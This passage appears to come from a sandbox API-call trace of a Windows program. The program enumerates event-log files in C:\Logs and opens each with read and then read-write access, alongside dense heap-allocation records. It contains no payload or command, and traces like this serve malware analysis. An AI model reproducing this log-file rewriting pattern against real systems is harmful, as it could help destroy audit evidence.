lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0086.410] AreFileApisANSI () returned 1 [0086.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0086.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 73 [0086.410] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0086.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.411] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.412] AreFileApisANSI () returned 1 [0086.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0086.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0086.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.412] AreFileApisANSI () returned 1 [0086.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 56 [0086.412] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.412] GetFileType (hFile=0x348) returned 0x1 [0086.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.412] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.413] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.413] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.413] CloseHandle (hObject=0x348) returned 1 [0086.413] AreFileApisANSI () returned 1 [0086.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 56 [0086.413] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.413] GetFileType (hFile=0x348) returned 0x1 [0086.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.413] CloseHandle (hObject=0x348) returned 1 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.414] AreFileApisANSI () returned 1 [0086.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 56 [0086.414] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0086.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.414] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ea0 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0086.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0086.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.416] AreFileApisANSI () returned 1 [0086.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0086.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.416] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0086.416] AreFileApisANSI () returned 1 [0086.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.416] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0086.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 58 [0086.416] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.416] GetFileType (hFile=0x348) returned 0x1 [0086.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0086.417] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.417] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.417] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.417] CloseHandle (hObject=0x348) returned 1 [0086.417] AreFileApisANSI () returned 1 [0086.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0086.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 58 [0086.417] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.418] GetFileType (hFile=0x348) returned 0x1 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.418] CloseHandle (hObject=0x348) returned 1 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.418] AreFileApisANSI () returned 1 [0086.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69e30 [0086.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 58 [0086.418] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: 